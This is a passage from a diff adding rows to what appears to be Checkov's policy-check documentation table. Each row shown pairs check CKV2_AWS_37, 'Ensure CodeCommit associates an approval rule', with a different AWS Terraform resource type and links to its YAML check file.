+| 1145 | CKV2_AWS_37              | resource                         | aws_flow_log                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1146 | CKV2_AWS_37              | resource                         | aws_fms_admin_account                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1147 | CKV2_AWS_37              | resource                         | aws_fsx_lustre_file_system                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1148 | CKV2_AWS_37              | resource                         | aws_fsx_windows_file_system                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1149 | CKV2_AWS_37              | resource                         | aws_gamelift_alias                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1150 | CKV2_AWS_37              | resource                         | aws_gamelift_build                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1151 | CKV2_AWS_37              | resource                         | aws_gamelift_fleet                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1152 | CKV2_AWS_37              | resource                         | aws_gamelift_game_session_queue                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1153 | CKV2_AWS_37              | resource                         | aws_glacier_vault                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1154 | CKV2_AWS_37              | resource                         | aws_glacier_vault_lock                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1155 | CKV2_AWS_37              | resource                         | aws_globalaccelerator_accelerator                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1156 | CKV2_AWS_37              | resource                         | aws_globalaccelerator_endpoint_group                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1157 | CKV2_AWS_37              | resource                         | aws_globalaccelerator_listener                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1158 | CKV2_AWS_37              | resource                         | aws_glue_catalog_database                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1159 | CKV2_AWS_37              | resource                         | aws_glue_catalog_table                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1160 | CKV2_AWS_37              | resource                         | aws_glue_classifier                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1161 | CKV2_AWS_37              | resource                         | aws_glue_connection                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1162 | CKV2_AWS_37              | resource                         | aws_glue_crawler                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1163 | CKV2_AWS_37              | resource                         | aws_glue_job                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1164 | CKV2_AWS_37              | resource                         | aws_glue_security_configuration                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1165 | CKV2_AWS_37              | resource                         | aws_glue_trigger                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1166 | CKV2_AWS_37              | resource                         | aws_glue_workflow                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1167 | CKV2_AWS_37              | resource                         | aws_guardduty_detector                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1168 | CKV2_AWS_37              | resource                         | aws_guardduty_invite_accepter                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1169 | CKV2_AWS_37              | resource                         | aws_guardduty_ipset                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1170 | CKV2_AWS_37              | resource                         | aws_guardduty_member                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1171 | CKV2_AWS_37              | resource                         | aws_guardduty_organization_admin_account                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1172 | CKV2_AWS_37              | resource                         | aws_guardduty_organization_configuration                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1173 | CKV2_AWS_37              | resource                         | aws_guardduty_threatintelset                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1174 | CKV2_AWS_37              | resource                         | aws_iam_access_key                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1175 | CKV2_AWS_37              | resource                         | aws_iam_account_alias                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1176 | CKV2_AWS_37              | resource                         | aws_iam_account_password_policy                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1177 | CKV2_AWS_37              | resource                         | aws_iam_group                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1178 | CKV2_AWS_37              | resource                         | aws_iam_group_membership                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1179 | CKV2_AWS_37              | resource                         | aws_iam_group_policy                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1180 | CKV2_AWS_37              | resource                         | aws_iam_group_policy_attachment                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1181 | CKV2_AWS_37              | resource                         | aws_iam_instance_profile                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1182 | CKV2_AWS_37              | resource                         | aws_iam_openid_connect_provider                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1183 | CKV2_AWS_37              | resource                         | aws_iam_policy                                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1184 | CKV2_AWS_37              | resource                         | aws_iam_policy_attachment                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1185 | CKV2_AWS_37              | resource                         | aws_iam_policy_document                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1186 | CKV2_AWS_37              | resource                         | aws_iam_role                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1187 | CKV2_AWS_37              | resource                         | aws_iam_role_policy                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1188 | CKV2_AWS_37              | resource                         | aws_iam_role_policy_attachment                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1189 | CKV2_AWS_37              | resource                         | aws_iam_saml_provider                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1190 | CKV2_AWS_37              | resource                         | aws_iam_server_certificate                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1191 | CKV2_AWS_37              | resource                         | aws_iam_service_linked_role                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1192 | CKV2_AWS_37              | resource                         | aws_iam_user                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1193 | CKV2_AWS_37              | resource                         | aws_iam_user_group_membership                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1194 | CKV2_AWS_37              | resource                         | aws_iam_user_login_profile                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1195 | CKV2_AWS_37              | resource                         | aws_iam_user_policy                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1196 | CKV2_AWS_37              | resource                         | aws_iam_user_policy_attachment                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1197 | CKV2_AWS_37              | resource                         | aws_iam_user_ssh_key                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1198 | CKV2_AWS_37              | resource                         | aws_inspector_assessment_target                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1199 | CKV2_AWS_37              | resource                         | aws_inspector_assessment_template                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1200 | CKV2_AWS_37              | resource                         | aws_inspector_resource_group                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1201 | CKV2_AWS_37              | resource                         | aws_instance                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1202 | CKV2_AWS_37              | resource                         | aws_internet_gateway                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1203 | CKV2_AWS_37              | resource                         | aws_iot_certificate                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1204 | CKV2_AWS_37              | resource                         | aws_iot_policy                                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1205 | CKV2_AWS_37              | resource                         | aws_iot_policy_attachment                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1206 | CKV2_AWS_37              | resource                         | aws_iot_role_alias                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1207 | CKV2_AWS_37              | resource                         | aws_iot_thing                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1208 | CKV2_AWS_37              | resource                         | aws_iot_thing_principal_attachment                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1209 | CKV2_AWS_37              | resource                         | aws_iot_thing_type                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1210 | CKV2_AWS_37              | resource                         | aws_iot_topic_rule                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1211 | CKV2_AWS_37              | resource                         | aws_key_pair                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1212 | CKV2_AWS_37              | resource                         | aws_kinesis_analytics_application                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1213 | CKV2_AWS_37              | resource                         | aws_kinesis_firehose_delivery_stream                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1214 | CKV2_AWS_37              | resource                         | aws_kinesis_stream                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1215 | CKV2_AWS_37              | resource                         | aws_kinesis_video_stream                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1216 | CKV2_AWS_37              | resource                         | aws_kms_alias                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1217 | CKV2_AWS_37              | resource                         | aws_kms_ciphertext                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1218 | CKV2_AWS_37              | resource                         | aws_kms_external_key                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1219 | CKV2_AWS_37              | resource                         | aws_kms_grant                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1220 | CKV2_AWS_37              | resource                         | aws_kms_key                                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1221 | CKV2_AWS_37              | resource                         | aws_lambda_alias                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1222 | CKV2_AWS_37              | resource                         | aws_lambda_event_source_mapping                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1223 | CKV2_AWS_37              | resource                         | aws_lambda_function                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1224 | CKV2_AWS_37              | resource                         | aws_lambda_function_event_invoke_config                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1225 | CKV2_AWS_37              | resource                         | aws_lambda_layer_version                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1226 | CKV2_AWS_37              | resource                         | aws_lambda_permission                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1227 | CKV2_AWS_37              | resource                         | aws_lambda_provisioned_concurrency_config                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1228 | CKV2_AWS_37              | resource                         | aws_launch_configuration                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1229 | CKV2_AWS_37              | resource                         | aws_launch_template                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1230 | CKV2_AWS_37              | resource                         | aws_lb                                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1231 | CKV2_AWS_37              | resource                         | aws_lb_cookie_stickiness_policy                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1232 | CKV2_AWS_37              | resource                         | aws_lb_listener                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1233 | CKV2_AWS_37              | resource                         | aws_lb_listener_certificate                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1234 | CKV2_AWS_37              | resource                         | aws_lb_listener_rule                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
